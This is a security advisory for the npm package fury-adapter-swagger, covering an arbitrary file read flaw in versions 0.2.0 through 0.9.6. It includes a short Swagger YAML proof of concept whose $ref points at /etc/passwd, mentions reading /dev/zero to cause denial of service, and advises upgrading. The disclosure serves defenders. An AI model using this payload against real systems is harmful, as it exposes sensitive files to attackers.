GHSA-2r7f-4h2c-5x73HighCVSS 7.3

fury-adapter-swagger allows arbitrary file read from system

Published
September 1, 2020
Last Modified
September 11, 2023

🔗 CVE IDs covered (1)

📋 Description

fury-adapter-swagger from version 0.2.0 until version 0.9.7 has a weakness that allows an attacker to read arbitrary files off of the system. This can be used to read sensitive data, or to cause a denial of service condition by attempting to read something like /dev/zero.

Proof of Concept:

---
swagger: '2.0'
info:
  title: Read local files
  version: '1.0'

paths:
  /foo:
    get:
      responses:
        200:
          description: Some description
          examples:
            text/html:
              example:
                $ref: '/etc/passwd'

Recommendation

Upgrade to version 0.9.7 or later.

🎯 Affected products1

  • npm/fury-adapter-swagger:>= 0.2.0, < 0.9.7

🔗 References (6)